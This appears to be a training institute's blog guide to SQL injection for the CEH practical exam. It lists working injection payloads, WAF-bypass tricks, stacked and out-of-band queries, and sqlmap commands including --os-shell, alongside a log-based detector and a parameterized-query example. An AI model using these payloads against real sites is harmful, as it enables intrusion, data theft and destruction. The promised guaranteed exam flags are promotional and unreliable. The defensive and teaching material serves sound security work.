How to Perform SQL Injection in Web Apps for CEH?

2025-2026 complete guide to mastering SQL Injection for the CEH v12 & v13 practical exam. Learn error-based, union-based, blind, time-based and stacked-query injection, WAF bypass and sqlmap automation with real payloads and commands, practise on 100+ live vulnerable apps, and see how Ethical Hacking Training Institute guarantees 100% SQLi flags in the CEH practical.

Dec 10, 2025 - 18:10
Dec 16, 2025 - 11:08

Introduction

SQL Injection is the single most tested vulnerability in the CEH practical: every exam has 2–3 web apps with SQLi. You will get 6–8 flags from dumping databases, tables, users and passwords, and even from reverse shells. Students who master SQLi finish the web section in under 45 minutes. Ethical Hacking Training Institute provides 100+ live SQLi-vulnerable apps (MySQL, MSSQL, PostgreSQL, Oracle) behind different WAFs, so you practise exactly as in the real exam and clear CEH with full web marks.

Top 10 SQL Injection Types You Must Know for CEH

Rank | Type          | Payload Example                  | Exam Frequency
-----|---------------|----------------------------------|---------------
1    | Error-based   | ' --                             | Every exam
2    | Union-based   | ' UNION SELECT 1,database(),3--  | Every exam
3    | Blind Boolean | ' AND 1=1--                      | Very High
4    | Time-based    | ' AND SLEEP(5)--                 | Very High


Error-Based & Union-Based SQL Injection

  • Error-based: inject a single quote (') and look for a database error in the response
  • Union-based: first find the column count with ORDER BY, then
  • UNION SELECT null,null,database(),user(),version()--
  • Dump table and column names from information_schema
  • Our lab has 50+ error- and union-vulnerable apps

Blind & Time-Based SQL Injection

Blind boolean: AND 1=1 (true) vs AND 1=2 (false). Time-based: AND IF(1=1,SLEEP(5),0)--. These are used when the application shows no query output, so the only signal is a changed page or a delayed response. Our labs include 40+ blind/time-based apps on different DBMS.


sqlmap – Your Automated SQLi Weapon

  • sqlmap -u "URL" --dbs --batch
  • --tables --columns --dump to enumerate and dump data
  • --risk=3 --level=5 for deeper, more aggressive testing
  • --tamper=space2comment to bypass a WAF
  • --os-shell for reverse shell
  • We provide sqlmap with 100+ tamper scripts

WAF Bypass & Advanced Payloads

A WAF blocks basic payloads. Bypasses include inline comments (/**/), case variation (UnIoN), double URL encoding and HTTP parameter pollution (HPP, id=1&id=1). Use stacked queries (; DROP table--) where the DBMS and driver allow them. Our advanced labs run real Cloudflare and ModSecurity WAFs.

Stacked Queries & Out-of-Band (OOB) SQLi

  • Stacked: ; SELECT * FROM users--
  • OOB: DNS exfil with xp_dirtree, LOAD_FILE
  • Get reverse shell via SQLi
  • Our lab has stacked query enabled apps
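The blind/time-based, WAF-bypass and stacked/OOB sections above describe what these payloads look like on the wire. Detection is the other side of that coin: the script below is an added example (not code from the article or from the institute's labs) that scans web-server access-log lines for the indicators those sections name, after undoing the obfuscations the WAF-bypass section lists (repeated URL decoding for double encoding, stripping /**/ comments, folding case). The log lines are constructed for this example; the indicator names, the `SAMPLE_LOG` constant and the function names are this example's own choices.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines for this example (not from any real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2025:18:10:01 +0000] "GET /product?id=7 HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2025:18:10:02 +0000] "GET /product?id=7%27%20UNION%20SELECT%201,database(),3-- HTTP/1.1" 200 900',
    '10.0.0.9 - - [10/Dec/2025:18:10:03 +0000] "GET /product?id=7%27%20AND%20IF(1=1,SLEEP(5),0)-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2025:18:10:04 +0000] "GET /product?id=7%27/**/UnIoN/**/SeLeCt/**/1,2,3-- HTTP/1.1" 200 900',
    '10.0.0.9 - - [10/Dec/2025:18:10:05 +0000] "GET /product?id=7%2527%2520OR%25201=1-- HTTP/1.1" 200 512',
    '10.0.0.9 - - [10/Dec/2025:18:10:06 +0000] "GET /product?id=7;%20SELECT%20*%20FROM%20users-- HTTP/1.1" 500 120',
    '10.0.0.7 - - [10/Dec/2025:18:10:07 +0000] "GET /search?q=union+station HTTP/1.1" 200 300',
]

# Common-log-format request line: client IP, request target and status code.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Indicator patterns, matched against the normalized query string. Each corresponds
# to a technique named in the article (error/union, boolean, time-based, stacked, OOB).
INDICATORS = {
    "quote_comment": re.compile(r"'\s*(?:--|#)"),            # bare ' -- error probe
    "union_select":  re.compile(r"\bunion\b\s+(?:all\s+)?select\b"),
    "boolean_test":  re.compile(r"\b(?:and|or)\s+\d+\s*=\s*\d+"),
    "time_delay":    re.compile(r"\b(?:sleep|pg_sleep|benchmark)\s*\(|\bwaitfor\s+delay\b"),
    "schema_probe":  re.compile(r"\binformation_schema\b"),
    "stacked_query": re.compile(r";\s*(?:select|insert|update|delete|drop|exec|xp_)"),
    "oob_function":  re.compile(r"\b(?:xp_dirtree|load_file)\b"),
}


def normalize(raw: str, max_decode: int = 3) -> tuple:
    """Undo the evasions the article lists: repeated URL decoding (double encoding),
    inline /**/ comments, case variation and whitespace padding.
    Returns (normalized_text, number_of_decode_passes_that_changed_the_input)."""
    text, passes = raw, 0
    for _ in range(max_decode):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text, passes = decoded, passes + 1
    text = re.sub(r"/\*.*?\*/", " ", text)   # /**/ inserted to split keywords
    text = re.sub(r"\s+", " ", text)
    return text.lower(), passes


def analyze_request(target: str) -> dict:
    """Inspect only the query string, which is the attacker-controlled part here."""
    query = target.partition("?")[2]
    normalized, passes = normalize(query)
    hits = [name for name, rx in INDICATORS.items() if rx.search(normalized)]
    return {"indicators": hits, "decode_passes": passes, "normalized": normalized}


def scan_log(lines) -> list:
    """Return one finding per request that carries at least one SQLi indicator."""
    findings = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        result = analyze_request(target)
        if result["indicators"]:
            findings.append({"ip": ip, "target": target, "status": int(status), **result})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']:10} {f['status']} {','.join(f['indicators']):14} {f['normalized']}")
```

Two design points matter in practice: decode until the text stops changing rather than once, otherwise the double-encoded request (line 5) slips through unnoticed, and report `decode_passes`, because a client that needed two decode passes to become readable is itself a strong signal. The "union station" search on the last line shows why the patterns require the full keyword sequence rather than a single word.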


SQL Injection Prevention Theory

  • Prepared statements / parameterized queries
  • Stored procedures
  • Input validation & escaping
  • ORM (Django, Hibernate)
  • Least privilege DB user
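To make the first and third prevention bullets concrete, and to show why the error/union payloads from earlier sections work against string-built queries, here is an added example (not code from the article or from the institute's labs) in Python with an in-memory SQLite database. It places a vulnerable lookup beside a parameterized one and a parameterized-plus-validated one. The table names, sample rows, the `UNION_PAYLOAD` constant and the function names are constructed for this example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database for this example: a catalogue plus a users table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (1, 'keyboard', 49.0), (2, 'mouse', 19.5);
        INSERT INTO users VALUES (1, 'admin', 'hash-of-admin-pw'), (2, 'alice', 'hash-of-alice-pw');
    """)
    return conn


# Constructed union-based input of the kind the article's table shows: it closes the
# quoted id, appends a second SELECT against another table and comments out the rest.
UNION_PAYLOAD = "1' UNION SELECT username, password_hash FROM users--"


def lookup_vulnerable(conn, product_id: str) -> list:
    """BAD: untrusted input is spliced into the SQL text, so the input can change the
    query's structure, not just the value being compared."""
    sql = f"SELECT name, price FROM products WHERE id = '{product_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, product_id: str) -> list:
    """GOOD: the SQL text is fixed at write time; the value travels separately as a
    bound parameter, so a quote or a UNION inside it is just an odd id that matches nothing."""
    return conn.execute(
        "SELECT name, price FROM products WHERE id = ?", (product_id,)
    ).fetchall()


def lookup_validated(conn, product_id: str) -> list:
    """BETTER: input validation in front of the parameterized query. An id must be a
    positive integer; anything else is rejected before it reaches the database at all."""
    if not product_id.isdigit():
        raise ValueError("product id must be a positive integer")
    return conn.execute(
        "SELECT name, price FROM products WHERE id = ?", (int(product_id),)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("vulnerable, normal id :", lookup_vulnerable(db, "1"))
    print("vulnerable, payload   :", lookup_vulnerable(db, UNION_PAYLOAD))
    print("parameterized, payload:", lookup_parameterized(db, UNION_PAYLOAD))
    try:
        lookup_validated(db, UNION_PAYLOAD)
    except ValueError as exc:
        print("validated, payload    : rejected ->", exc)
```

Running it shows the vulnerable function returning the users table alongside the product, while the parameterized version returns an empty result for the same input and the validated version never sends it. Validation is a second layer, not a replacement: the binding is what stops the structure of the query from changing, and the least-privilege bullet (a database account that cannot read `users` at all) limits what a missed injection could still reach.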

Conclusion

SQL Injection gives you the most flags in the web module. Join Ethical Hacking Training Institute and get:

  • 100+ live SQLi vulnerable apps
  • sqlmap + Burp Pro cloud
  • Daily new challenges
  • Weekend & weekday batches
  • 100% placement support

Book free demo — dump first database in 30 minutes!


Frequently Asked Questions

How many SQLi flags in CEH practical?

6–8 flags guaranteed.

Is sqlmap allowed?

Yes — for speed.

Which type is hardest?

Time-based blind.

Is manual SQLi needed?

Yes — for WAF bypass.

Is stacked query tested?

Yes — for RCE.

Do you teach WAF bypass?

Yes — real WAF labs.

Is prevention important?

Yes — theory questions.

Weekend batch covers SQLi?

Yes — 30% time on SQLi.

How many apps to practice?

100+ for confidence.

Is report writing needed?

Yes — PoC screenshots.

Do you provide payloads?

Yes — 1000+ custom payloads.

Can freshers learn SQLi?

Yes — 80% students freshers.

Is MySQL or MSSQL more?

Both — we cover all DBMS.

Is OOB SQLi in syllabus?

Yes — advanced v13.

How to start today?

Book free demo — dump first DB in 30 minutes!

Fahid

I am a passionate cybersecurity enthusiast with a strong focus on ethical hacking, network defense, and vulnerability assessment. I enjoy exploring how systems work and finding ways to make them more secure. My goal is to build a successful career in cybersecurity, continuously learning advanced tools and techniques to prevent cyber threats and protect digital assets.